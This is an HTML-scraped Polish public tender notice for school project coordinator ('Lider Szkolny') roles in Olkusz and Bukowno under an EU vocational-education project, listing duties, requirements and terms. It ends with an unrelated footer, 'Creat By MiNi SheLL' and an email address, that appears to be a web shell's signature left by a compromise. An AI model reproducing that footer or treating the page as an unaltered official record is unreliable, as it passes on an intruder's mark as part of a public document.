18.	Niezwłoczne informowanie koordynatora ds. realizacji projektu o okolicznościach, których zaistnienie uzasadniałoby wprowadzenie zmian w realizacji zadań projektu oraz o ewentualnych przeszkodach przy realizacji zadań, w tym o ryzyku zaprzestania realizacji zadań. Reagowanie na wystąpienie nieprzewidzianych problemów, podejmowanie działań naprawczych.
19.	Promowanie projektu na radach pedagogicznych, informowanie społeczności lokalnej, uczniów oraz ich rodziców o postępie rzeczowym w ramach prowadzonych form wsparcia oraz o źródłach finansowania projektu. Stosowanie materiałów informacyjnych i wzorów dokumentów przekazanych przez Lidera Partnerstwa i Biuro Realizatora Projektu.
20.	Nadzorowanie jakości zajęć pozalekcyjnych i kursów oraz staży-wizyt zawodoznawczych m. in. przez niezapowiedziane wizyty w trakcie trwania zajęć
21.	Współpraca z koordynatorem ds. realizacji projektu w zakresie przeprowadzania ewaluacji realizowanych w szkole zajęć.
22.	Wykonywanie innych zadań wynikających z umowy oraz z innych dokumentów i zleceń związanych z realizacją projektu, w celu zapewnienia sprawnej realizacji, promocji i rozliczania projektu.
Wymagania dodatkowe osoby która będzie pełnić  funkcję lidera szkolnego
a)	znajomość planów lekcji zajęć szkolnych uczniów,
b)	możliwość kontaktu z uczniami oraz nauczycielami w czasie trwania zajęć lekcyjnych oraz realizowanych w ramach projektu (być dyspozycyjnym w tym czasie)
c)	znajomość statutu szkoły,
d)	umiejętność porozumiewania się z prowadzącymi zajęcia,
e)	umiejętność koordynowania zajęć dodatkowych, pozalekcyjnych z zajęciami realizowanymi w ramach programu nauczania,
f)	znajomość merytoryczna i organizacyjna pracy szkół ponadgimnazjalnych w tym kształcenia zawodowego
g)	znajomość zaplecza dydaktycznego szkoły uczestniczącej w projekcie
h)	znajomość przepisów z zakresu: ustawy o finansach publicznych, ustawy prawo zamówień publicznych, ustawy o ochronie danych osobowych oraz przepisów prawa oświatowego
i)	znajomość przepisów i dokumentów związanych z realizacją projektów w ramach Programu Operacyjnego Kapitał Ludzki w okresie 2007-2013, 
j)	znajomość założeń projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, umiejętność pracy w zespole,
k)	odpowiedzialność, sumienność, rzetelność, skrupulatność, terminowość wykonywania zadań,
l)	wysoka kultura osobista oraz łatwość nawiązywania kontaktów interpersonalnych,
m)	dyspozycyjność pracy w soboty i niedziele,
n)	mobilność w poruszaniu się w obrębie powiatu

Zamawiający nie będzie dokonywał zakupów sprzętu komputerowego oraz biurowego na rzecz osób pełniących funkcję Lidera Szkolnego. W związku z powyższym Lider Szkolny musi posiadać własny sprzęt tj. co najmniej komputer, telefon oraz drukarkę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Lider Szkolny w Zespole Szkół nr 4 w Olkuszu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków Lidera Szkolnego należeć będzie:
1.	Wdrożenie we współpracy ze społecznością szkolną Programu Rozwoju Szkoły w zakresie objętym problematyką projektu.
2.	Współpraca z gronem pedagogicznym i rodzicami uczniów objętym wsparciem w obszarze prawidłowej realizacji działań wynikających z Programu Rozwoju Szkoły, jego założeń, statutu i misji szkoły.
3.	Nadzór nad prawidłową realizacją Programu Rozwoju Szkoły w zakresie objętym projektem.
4.	Nadzór nad prawidłowym dokumentowaniem realizacji projektu w szkole.
5.	Współpraca w zakresie zamówień publicznych przeprowadzonych w ramach projektu m.in. przygotowywanie opisu przedmiotu zamówienia
6.	Stała współpraca z koordynatorem ds. realizacji projektu w zakresie realizacji projektu.
7.	Monitorowanie realizacji założonych rezultatów zgodnie z wnioskiem o dofinansowanie.
8.	Opracowanie harmonogramów zajęć wyrównawczych i szkoleń branżowych w ramach projektu.
9.	Nadzór nad procesem rekrutacji uczniów do projektu w szkołach oraz pomoc uczniom w wypełnianiu dokumentacji rekrutacyjnej.
10.	Współpraca przy opracowywaniu procedur związanych z realizacją projektu m.in. regulaminów rekrutacji, programu i harmonogramów zajęć wyrównawczych, zajęć rozwijających kompetencje kluczowe, kursów i szkoleń branżowych w ramach projektu oraz staży-wizyt zawodoznawczych.
11.	Nadzór nad prawidłowym oznaczeniem materiałów promocyjnych, edukacyjnych, informacyjnych, szkoleniowych oraz oznaczeniem szkoły, sal i sprzętów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
12.	Przekazywanie do koordynatora ds. realizacji projektu niezbędnych informacji i wyjaśnień związanych z realizacją projektu.
13.	Zarządzanie danymi osobowymi osób uczestniczących w projekcie realizowanym w szkole zgodnie z ustawą o ochronie danych osobowych.
14.	Zapewnienie warunków sprawnego przeprowadzenia kontroli w zakresie prawidłowej realizacji projektu prowadzonej przez Biuro Realizatora Projektu, Biuro Lidera oraz przez instytucje uprawnione do przeprowadzenia kontroli realizacji projektu na terenie szkoły i warsztatów szkolnych.
15.	Udostępnianie każdorazowo na wniosek koordynatora ds. realizacji projektu lub uprawnionych podmiotów dokumentów lub informacji umożliwiających dokonanie oceny wpływu realizowanych zadań w odniesieniu do celów Projektu i celów Programu Operacyjnego Kapitał Ludzki.
16.	Współpraca z Biurem Realizatora Projektu oraz komunikowanie się w ramach realizacji projektu w uzgodniony sposób.
17.	Uczestnictwo w spotkaniach z przedstawicielami Biura Realizatora Projektu i Lidera Projektu.
18.	Niezwłoczne informowanie koordynatora ds. realizacji projektu o okolicznościach, których zaistnienie uzasadniałoby wprowadzenie zmian w realizacji zadań projektu oraz o ewentualnych przeszkodach przy realizacji zadań, w tym o ryzyku zaprzestania realizacji zadań. Reagowanie na wystąpienie nieprzewidzianych problemów, podejmowanie działań naprawczych.
19.	Promowanie projektu na radach pedagogicznych, informowanie społeczności lokalnej, uczniów oraz ich rodziców o postępie rzeczowym w ramach prowadzonych form wsparcia oraz o źródłach finansowania projektu. Stosowanie materiałów informacyjnych i wzorów dokumentów przekazanych przez Lidera Partnerstwa i Biuro Realizatora Projektu.
20.	Nadzorowanie jakości zajęć pozalekcyjnych i kursów oraz staży-wizyt zawodoznawczych m. in. przez niezapowiedziane wizyty w trakcie trwania zajęć
21.	Współpraca z koordynatorem ds. realizacji projektu w zakresie przeprowadzania ewaluacji realizowanych w szkole zajęć.
22.	Wykonywanie innych zadań wynikających z umowy oraz z innych dokumentów i zleceń związanych z realizacją projektu, w celu zapewnienia sprawnej realizacji, promocji i rozliczania projektu.
Wymagania dodatkowe osoby która będzie pełnić  funkcję lidera szkolnego
a)	znajomość planów lekcji zajęć szkolnych uczniów,
b)	możliwość kontaktu z uczniami oraz nauczycielami w czasie trwania zajęć lekcyjnych oraz realizowanych w ramach projektu (być dyspozycyjnym w tym czasie)
c)	znajomość statutu szkoły,
d)	umiejętność porozumiewania się z prowadzącymi zajęcia,
e)	umiejętność koordynowania zajęć dodatkowych, pozalekcyjnych z zajęciami realizowanymi w ramach programu nauczania,
f)	znajomość merytoryczna i organizacyjna pracy szkół ponadgimnazjalnych w tym kształcenia zawodowego
g)	znajomość zaplecza dydaktycznego szkoły uczestniczącej w projekcie
h)	znajomość przepisów z zakresu: ustawy o finansach publicznych, ustawy prawo zamówień publicznych, ustawy o ochronie danych osobowych oraz przepisów prawa oświatowego
i)	znajomość przepisów i dokumentów związanych z realizacją projektów w ramach Programu Operacyjnego Kapitał Ludzki w okresie 2007-2013, 
j)	znajomość założeń projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, umiejętność pracy w zespole,
k)	odpowiedzialność, sumienność, rzetelność, skrupulatność, terminowość wykonywania zadań,
l)	wysoka kultura osobista oraz łatwość nawiązywania kontaktów interpersonalnych,
m)	dyspozycyjność pracy w soboty i niedziele,
n)	mobilność w poruszaniu się w obrębie powiatu

Zamawiający nie będzie dokonywał zakupów sprzętu komputerowego oraz biurowego na rzecz osób pełniących funkcję Lidera Szkolnego. W związku z powyższym Lider Szkolny musi posiadać własny sprzęt tj. co najmniej komputer, telefon oraz drukarkę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Lider Szkolny w Zespole Szkół w Bukownie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków Lidera Szkolnego należeć będzie:
1.	Wdrożenie we współpracy ze społecznością szkolną Programu Rozwoju Szkoły w zakresie objętym problematyką projektu.
2.	Współpraca z gronem pedagogicznym i rodzicami uczniów objętym wsparciem w obszarze prawidłowej realizacji działań wynikających z Programu Rozwoju Szkoły, jego założeń, statutu i misji szkoły.
3.	Nadzór nad prawidłową realizacją Programu Rozwoju Szkoły w zakresie objętym projektem.
4.	Nadzór nad prawidłowym dokumentowaniem realizacji projektu w szkole.
5.	Współpraca w zakresie zamówień publicznych przeprowadzonych w ramach projektu m.in. przygotowywanie opisu przedmiotu zamówienia
6.	Stała współpraca z koordynatorem ds. realizacji projektu w zakresie realizacji projektu.
7.	Monitorowanie realizacji założonych rezultatów zgodnie z wnioskiem o dofinansowanie.
8.	Opracowanie harmonogramów zajęć wyrównawczych i szkoleń branżowych w ramach projektu.
9.	Nadzór nad procesem rekrutacji uczniów do projektu w szkołach oraz pomoc uczniom w wypełnianiu dokumentacji rekrutacyjnej.
10.	Współpraca przy opracowywaniu procedur związanych z realizacją projektu m.in. regulaminów rekrutacji, programu i harmonogramów zajęć wyrównawczych, zajęć rozwijających kompetencje kluczowe, kursów i szkoleń branżowych w ramach projektu oraz staży-wizyt zawodoznawczych.
11.	Nadzór nad prawidłowym oznaczeniem materiałów promocyjnych, edukacyjnych, informacyjnych, szkoleniowych oraz oznaczeniem szkoły, sal i sprzętów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
12.	Przekazywanie do koordynatora ds. realizacji projektu niezbędnych informacji i wyjaśnień związanych z realizacją projektu.
13.	Zarządzanie danymi osobowymi osób uczestniczących w projekcie realizowanym w szkole zgodnie z ustawą o ochronie danych osobowych.
14.	Zapewnienie warunków sprawnego przeprowadzenia kontroli w zakresie prawidłowej realizacji projektu prowadzonej przez Biuro Realizatora Projektu, Biuro Lidera oraz przez instytucje uprawnione do przeprowadzenia kontroli realizacji projektu na terenie szkoły i warsztatów szkolnych.
15.	Udostępnianie każdorazowo na wniosek koordynatora ds. realizacji projektu lub uprawnionych podmiotów dokumentów lub informacji umożliwiających dokonanie oceny wpływu realizowanych zadań w odniesieniu do celów Projektu i celów Programu Operacyjnego Kapitał Ludzki.
16.	Współpraca z Biurem Realizatora Projektu oraz komunikowanie się w ramach realizacji projektu w uzgodniony sposób.
17.	Uczestnictwo w spotkaniach z przedstawicielami Biura Realizatora Projektu i Lidera Projektu.
18.	Niezwłoczne informowanie koordynatora ds. realizacji projektu o okolicznościach, których zaistnienie uzasadniałoby wprowadzenie zmian w realizacji zadań projektu oraz o ewentualnych przeszkodach przy realizacji zadań, w tym o ryzyku zaprzestania realizacji zadań. Reagowanie na wystąpienie nieprzewidzianych problemów, podejmowanie działań naprawczych.
19.	Promowanie projektu na radach pedagogicznych, informowanie społeczności lokalnej, uczniów oraz ich rodziców o postępie rzeczowym w ramach prowadzonych form wsparcia oraz o źródłach finansowania projektu. Stosowanie materiałów informacyjnych i wzorów dokumentów przekazanych przez Lidera Partnerstwa i Biuro Realizatora Projektu.
20.	Nadzorowanie jakości zajęć pozalekcyjnych i kursów oraz staży-wizyt zawodoznawczych m. in. przez niezapowiedziane wizyty w trakcie trwania zajęć
21.	Współpraca z koordynatorem ds. realizacji projektu w zakresie przeprowadzania ewaluacji realizowanych w szkole zajęć.
22.	Wykonywanie innych zadań wynikających z umowy oraz z innych dokumentów i zleceń związanych z realizacją projektu, w celu zapewnienia sprawnej realizacji, promocji i rozliczania projektu.
Wymagania dodatkowe osoby która będzie pełnić  funkcję lidera szkolnego
a)	znajomość planów lekcji zajęć szkolnych uczniów,
b)	możliwość kontaktu z uczniami oraz nauczycielami w czasie trwania zajęć lekcyjnych oraz realizowanych w ramach projektu (być dyspozycyjnym w tym czasie)
c)	znajomość statutu szkoły,
d)	umiejętność porozumiewania się z prowadzącymi zajęcia,
e)	umiejętność koordynowania zajęć dodatkowych, pozalekcyjnych z zajęciami realizowanymi w ramach programu nauczania,
f)	znajomość merytoryczna i organizacyjna pracy szkół ponadgimnazjalnych w tym kształcenia zawodowego
g)	znajomość zaplecza dydaktycznego szkoły uczestniczącej w projekcie
h)	znajomość przepisów z zakresu: ustawy o finansach publicznych, ustawy prawo zamówień publicznych, ustawy o ochronie danych osobowych oraz przepisów prawa oświatowego
i)	znajomość przepisów i dokumentów związanych z realizacją projektów w ramach Programu Operacyjnego Kapitał Ludzki w okresie 2007-2013, 
j)	znajomość założeń projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, umiejętność pracy w zespole,
k)	odpowiedzialność, sumienność, rzetelność, skrupulatność, terminowość wykonywania zadań,
l)	wysoka kultura osobista oraz łatwość nawiązywania kontaktów interpersonalnych,
m)	dyspozycyjność pracy w soboty i niedziele,
n)	mobilność w poruszaniu się w obrębie powiatu

Zamawiający nie będzie dokonywał zakupów sprzętu komputerowego oraz biurowego na rzecz osób pełniących funkcję Lidera Szkolnego. W związku z powyższym Lider Szkolny musi posiadać własny sprzęt tj. co najmniej komputer, telefon oraz drukarkę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com